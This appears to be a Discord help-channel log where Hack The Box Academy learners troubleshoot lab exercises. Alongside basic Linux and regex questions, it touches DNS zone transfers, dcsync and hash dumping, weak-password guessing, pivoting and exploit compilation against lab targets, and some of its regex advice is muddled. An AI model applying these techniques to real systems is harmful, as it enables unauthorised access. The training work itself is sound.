Except that's not the excersize

The exercise is to do it against the sshd_config file

grep -i permit

in regex the reserved character for "start with" is ^

I thought that was start of line? Unless I'm misreading the prompt. Which is likely, bc it is worded weirdly, to sound like "words that start with Permit"

hmm dont know the exact case here

That's the phrasing

But there's no actual answer-box to confirm correct vs incorrect cases/amount

grep -E "(Permit|permit)" sshd_config. ?

Use the full path of the sshd_config file from the section

/etc/ssh/sshd_config

Thanks! I will try that.

grep -E "(Permit|permit)" /etc/ssh/sshd_config

But it might be the case where you need to do grep -E "^Permit"

ok Ill try

Or something like that

hey does anyone else have the issue compiling exploits on your own machine to putting on target GLIBC error

but when compiling on the HTB attack machine works fine??

Because if you don't statically compile it links to your glib version, which is likely different on the target

didnt work it showed nothing

i Tried
grep -E "(Permit|permit)" /etc/ssh/sshd_config
grep -E "(^Permit|permit)" /etc/ssh/sshd_config

Try putting the ^ before the quotes

didnt work

when I try
/etc/ssh/sshd_config
Its says permission denied

and with sudo command not found

Ah

It's because it doesn't actually start with Permit

The start of the line has a #

Hello i m doing Linux fundamental module im stuck in the find and files directories section.
To solve the first question :
" What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"
i tried the command : find -type f -newermt 2020-03-03 -size -28k -size +25k
i have the Vscodium output file but it's the only file and it's the wrong answer

grep -E "Permit.*\s"

Hint: you're not ssh to the target

i tried on the target machine but i have no output

doesn't find require the path? otherwise it'll start its search from where you are (currently htb-student's home dir), which wont be an awful lot

try adding / at the end to search the whole system

This

and maybe 2>/dev/null if it starts spamming you with permission denied

^ it will

didnt work

Since / will attempt to also search root protected dirs

Yeah some of the prompts are a bit dumb tbh

"Line starts with" except some of the valid lines use #

ask chatgpt but i would not "lose" too much time with that xd

It's really dumb and I can see where frustrated could happen with it lol

ok now It worked with
grep -E "Permit.*\s" /etc/ssh/sshd_config

Thank you 🙂

...

"now"

i had forgotten s earlier

Lol

https://www.rexegg.com/regex-quickstart.html

Btw

it's normal that the output gave me 634 file ?

or was it that I used grep -E "(Permit.*\s)" /etc/ssh/sshd_config
( )

https://regex101.com/

Wc gives line numbers and character count

when i remove the wc i really have 634 path of different file

You only really need the () if you're doing multiple expressions

Which is what the question is asking for (the filename)

But 634 is irrelevant

i dont find more hint in the question to filter more in the 634 files

i forget exactly how this question went, but it does mention config files

maybe something to do with the name, or the starting path?

oh i found it

^

-name "*.conf"

yes thanks

Btw they give you a search command in the examples :) which is also helpful

ok ,, thanks

so the .*\s if I want to filter lines start starts with Permit and. $ when it ends with Permit ? or is it only the -- *

So this one is actually tricky.

Like I said these prompts are kinda dumb because there's no "wrong/right" case

So this isn't asking for lines that start with permit

It's looking for words that start with Permit

sorry i meant words

I.e. if you know that a line starts with Bob and ends with Lisa but don't care what's in between you'd use "^Bob.*Lisa$"

But like I said this is dumb, as some of the lines start with #

So you'd need to filter the line starts with ones with both "(^#\bSearch|^Search)"

If you do wanna look through the resources me and xreous sent, feel free - RegEx is really good to learn

Another thing with grep, if you add -n it adds line number

So how can i fix this on attack machine or where can i go to get precompiled?

Should be a static compile option for it, I think it's been mentioned before

ok I didnt need to use #
but and what if I only want words that ends with "login"

Login$

$ is the end of line character

"(^|\b).*Login(\b)"

\b is "word boundary" meaning a space/anything that separates it

ok but It also shows me the word that begins with Login

dont I need the $

End is only if you're looking for end of line

Also to get a word only it's "\bLogin.*\b"

shows nothing without the |

?

None of the examples have you search "Login"

no im trying out tryna learn it

yes then

OK after some digging using your keyword are you trying to search for just the one that *starts with Login(Whatever)?

ok when I tried yes it worked .. =/

that only ends with Login

So you'll need to add the # character in it. No lines end with Login in that file

hey guys is there some online hack testing servers, i mean servers which i can try to access through nmap and all for practicing. ik there's HTB labs but i haven't dived much into it. is it free? can i access it through local pc or does it have in built terminal?

I suggest making your own test file with a bunch of different cases to see what you can do differently

hi i need help with second order lfi challange anyone?

Htb labs is free, you need to use a provided vpn to access the labs, note: the vpn only connects you to their servers - it does not reroute traffic

he guys i need help on Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. i find all DNS subdoman but not txt flag at all of them 3 day i stock here please help

module name is modern web exploitation

If it's a challenge on https://app.hackthebox.com then #challenges

do i have to use their vpn or can i use proxychains?

academy

ATTACKING COMMON SERVICES under Attack DNS

You have to use their vpn, as the boxes spawn on an internal network

alr i see

tysm

"(^|\b).*yes(\b)"
shows me.
words space between the words and yes. like
pam yes
not yes
pass code yes
cpm uno yes

Read #welcome on how to access more of the server btw @rustic sage

Just look for "yes$"

Anyone available for modern web exploitation - second order lfi question ?

dig axfr subdomain.inlanefreight.htb @ip

hr.inlanefreight.htb ns.inlanefreight.htb control.inlanefreight.htb helpdesk.inlanefreight.htb i do for all of them no Flag i tired 😦

One of those is correct, or should be

ok now I get it ,,, thanks once again

In module: PIVOTING, TUNNELING, AND PORT FORWARDING and in section: Meterpreter Tunneling & Port Forwarding

I get error when I try to run autoroute in metasploit, is it outdated script or something? Already tried to update metasploit to the newest version and running metasploit as root

ohh tysm so many of the channels were locked

iknow is ns. and hr is correct but no flag on DNS records TXT

You need to do a zone transfer

mmmm zone transfer with ettercap ?

Or dig

Literally just did it with dig

Don't need to do any type of mitm attack

😢 3 day never have this time for small think like this

Use brain

I even gave you the rough command

they burn my barin really xD

THERE dig txt

No

CNAME

Dude

The zone transfer command is given in this section

Or an example of it

mmm i will seee now

Just engage your brain a tiny bit, and read

And take notes when you're doing modules

If you are taking notes: your notes are shit

dig AXFR @ns.inlanefreight.htb inlanefreight.htb

; <<>> DiG 9.19.19-1-Debian <<>> AXFR @ns.inlanefreight.htb inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

Anyone available for modern web exploitation - second order lfi question ?

i find thanks

Use ip

This cannot work unless you have mapped ns.inlanefreight.htb to the IP address of the target in the /etc/hosts file
But that makes no sense. You can use the IP address directly

Just ask your question dude

finally i find

my god long time for this flag wow

thanks Marcielee

@fathom pendant Thanks

Read up on the subject of DNS so that you understand exactly what happens and when.

i change filename to flag and username to admin, htb-admin, root and etc but can't read flag. I do it according to readin material with correct order. What i am doing wrong? username is guessy i think

anyone had any issues with dirtypipe exploit

@acoustic owl yes i find it thanks i will care more on txt

I mean, look at how DNS works in general.
If you had understood how DNS works, you wouldn't have been in this position in the first place

When I want to login to splunk I get a 403 I have been having this error since yesterday 😦

Where are you trying to log in to Splunk? Did you use https?

yes i try my best to understand as this English not is my mom language so i have to problem undrstand the word and undrstand the way xD it take time but its ok ... i love it

Yes I did

I'm trying from there https://splunkbase.splunk.com/app/3544

https://www.cloudflare.com/learning/dns/what-is-dns/
You can change the language at the top right

It work when I'm outside of the pwnbox but not when I'm in it

thanks PayloadBunny

Then download the file from your PC and use it from there.

Yeah but I would need to setup the vpn and I don't really want to

Hi everyone!
I need help with ADCS
I think there is technical problem with ADCS modul's ESC11. I took screenshots, you can see I can use hashes of "lab-dc" I got error, but I can dump hashes but they are belongs to lab-dc
I need hashes of "ws01"
When I try to use hash of "ws01" account I am getting exact same error, but I couldn't dump hashes. Why? What should I suppose to do?

PLEASE DO NOT DELETE. I GUARANTEE THERE IS NO SPOILER

I asked help from support in website, but I haven't get response yet

It's been 2 days I stuck

If it doesn't work from the PwnBox, then you don't have much choice

Hi 👋 Can you help me with above problem : )

why are you using secretsdump on ws01?

why dont they work ?
$ chmod cdhmod a+r shell && ls -l shell
$ chmod 754 shell && ls -l shell

Because you need to provide a file to chmod

I followed lab

and I need Administrator's hash

you dcsync'd DC didn't you?

To be honest I didn't understand what you asked

do you mean etc/ssh/sshd_config or what

Does "shell" exist as a file

doing the ADCS module kinda require you to be familiar with the common AD attacks, you used secretsdump on dc, so you have the administrator's hash

no .. no such command

bash : shell : command not found

If you ls your current directory, does the file exist

If not, then you need to create the file first

Yes but that hash belongs to "lab-dc" hostname Module asking hash of ws01 which I couldn't get

I got .pfx file of "lab-dc" i couldn't get file of "ws01" but using pfx file I am abile to get .ccache file and hash of "lab-dc" account

Using only lab-dc hash I can dump all users hash including adminstrator but they are wrong because their hostname is "lab-dc" not ws01.

Then I realised I have ws01 accounts hash too. When I repeat proceess I couldn't get hashes of ws01

didnt have one .. create shell or what ?

The section likely went over this

when you dcsync you get hashes of all users, including the domain admin

I did but it says wrong, I connected with pass the hash attack to check that account is "lab-dc" module asking hash of "ws01"

You finished ADCS module which released recently. ?

they showed how to create a .txt if thats what u mean ?

Yes

they're asking for the hash of the local admin, dump the reg hives of ms01 with DA's creds

I think you misunderstood problem. Anyway, thank you for trying to help

The method works for creating any file btw

shell.txt chmod a+r shell && ls -l shell ??
access denied

¯_(ツ)_/¯

Idk what you did so can't tell you where you went wrong

no I didn't, I finished the module

sudo maybe

^

Definitely, when you sudo it creates the file as root

I meant ws01 here

ESC11 lab didn't mention any reg hives, after getting .pfx file it mentioned to ESC8 attack scenario. That's why I can not find ws01's hash.

Thank you anyway I will try

where are you gonna find ws01's local admin hash then?

I was thinking I am supposed to find it by using secretsdump with ws01 hash. I will try your suggestion

secretsdump is for dcsync in this case, ws01 is not a DC

Thank you : ) If you don't mind me I want to ask one more thing. How many time it take to learn professionally Active Directory for you?! I am about to dive into active directory

Ive tried

shell chmod a+r shell && ls -l shell
shell.txt chmod a+r shell %% ls-s shell.txt

shell.txt chmod a+r shell %% ls-s shell.t /etc/ssh/sshd_config

chmod missing operand

permission denied

the main AD module in academy will set you up pretty well

Ive tried for 30min now can you please help me

Hello! I got stucked at AD Enumeration & Attacks - Skills Assessment Part II. Currently I am Q4. I got a bunch of usernames by using crackmapexec --users with the creds that i found earlier. The question is "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain". How can i find the user with weak credentials?

Welcome1 is a weak credential xd is a tricky question

But how did you got Welcome1?

This password has been used x times in the module

yes but like it doesnt connect in any way to the assessment... Anyway thank you for your help 🙂

i was like creating pw list with spices and shit like that

thats the tricky part

No, it is not directly related to the assessment.
You simply try a lead-free password and see if you are lucky.
Since you don't know anything about the company and therefore can't use OSINT, you have to rely on the module.

makes sense but still a bit twisted

Hey guys, this question is not for a specific module but it definitely has to do with multiple modules (please refer me to the correct channel if this is not it). Do you know if its possible to use BurpSuite over a double pivot connection? I have a double pivot set up with chisel and I am trying to access a website in the second subnet. I can do it with proxychains curl but I cannot seem to figure out how to configure burp (or firefox) to be able to acess it?
PS I know ligolo-ng works better but I coulnd't use it in my situation

I Typed chmod
chmod : missing operand
do I have to install something before using it

No

Missing operand means that you're missing arguments

I.e. chmod 754 filename

Btw if you're changing shell.txt you need to specify the .txt

I.e is new to me

I.e. means for example

It's not a command

ok my bad, english is not my motherlanguage

I tried to create one

shell.txt chmod a+r shell && ls-s shell.t /etc/ssh/sshd_config

Why are you adding /etc/ssh/sshd_config

Break your command down into its components

But at this point I'm tired of trying to help through a language barrier

As it ends up flooding the channel

Because i already tried everything else I know

When I say break it down: what do you think I mean

Because I understand you want/need help. But you also need to learn how to rely on yourself in the absence of others

man Im trying Ive been working with this for the last 7 hours

Take a break and step away

ok after this one

Reading the manual and help of commands really is gonna be useful

If you're misunderstanding the module, then likely the translation/translator is missing something

I think u mean that I should type in one part at the time ....

adding

Yes one section of commands at a time

Break the command into the two halves

With && being the separator

chmod cannot access shell no such file or directory

Alright, there's your first clue

The file "shell" doesn't exist

You made shell.txt

Not 'shell'

yes then I tried to create the shell both >shell.txt. >shell

Take it step by step from the section in the module

https://tenor.com/view/hallelujah-praise-gif-22867907

ok got it

only

shell

not at the same time

I meant not on the same line

Do me a favor

Ok now I can take a break

Link your main htb account following #welcome (its the labs site https://app.hackthebox.com )

So you can post screenshots

ok .. I though it was here you could ask question about the moduls
but sure Ill do it now

Yes you can ask questions

But without a screenshot a lot of what you're trying to say gets lost in translation

Leading to increased frustration

aha ok , Im trying to run the identifier in bot-commands but it says its blocked

"Blocked"

It's likely due to your messaging settings

Not allowed from anyone but friends

im lost about how to find the hidden port in https://academy.hackthebox.com/module/19/section/119

seems like i tried all the methods given

Read this Section again
https://academy.hackthebox.com/module/19/section/106

Hey guys, i´m currently stuck at the "Attacking Common Services - SQL" module.
I just can´t connect to the db no matter what i try.
With mssqlclient, it just hangs forever and gets connection timed out after a while and with sqsh it does not execute commands.

I restarted the box multiple time and changed my vpn file

pawnbox is the same thing

ok thanks man, I see now that there is whole of stuff for training there 🙂

why doesnt this work? skill assesemnt 2 attakcing common applications

http

bruh

🤦‍♂️

Just wondering, has htb helped anyone get a job? Like with experience

#careers-and-certs

Says no access

They're gonna need to link their htb account following instructions from #welcome

It seems you cannot link a HTB academy account to discord. Only a "main" HTB account can be linked

Yes, you can currently only link accounts to Discord from the main page.

I am stuck in 'Intro to Active Directory Module' while removing a user
In AD admnistration :Guided Part 1

At line:1 char:1
+ Remove-ADUser -Identity pvalencia
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (pvalencia:ADUser) [Remove-ADUser], UnauthorizedAccessException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.UnauthorizedAccessException,Microsoft.ActiveDirectory.Manag
   ement.Commands.RemoveADUser```
Is this right plaform to ask for help?

that is a fqdn not an url 🙂

url's have protocol

can someone explain why there's like two sections on reverse engineering in the attacking common applications and no where else in the path?

just do it

you dont need a reason

hahaha

alright

Question

Is there a way to detect Server Side Include injections? Because there doesn't seem to be any evidence in the request/response...

hi

taking 500 years to spawn a target

🤔

Guys need help I posted my question in support can someone help me?

I have Mac and I want to use Parrot ISO what do you reccomend VMware Workstation Player or Oracle Virtual Box ???

What is it about?

I use Parallels on my Mac

About PwnBox need some info

#1024429874246590575 isn't support btw

how much do you pay ?

Sorry am new here

Actual support for technical issues and questions is on the website

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support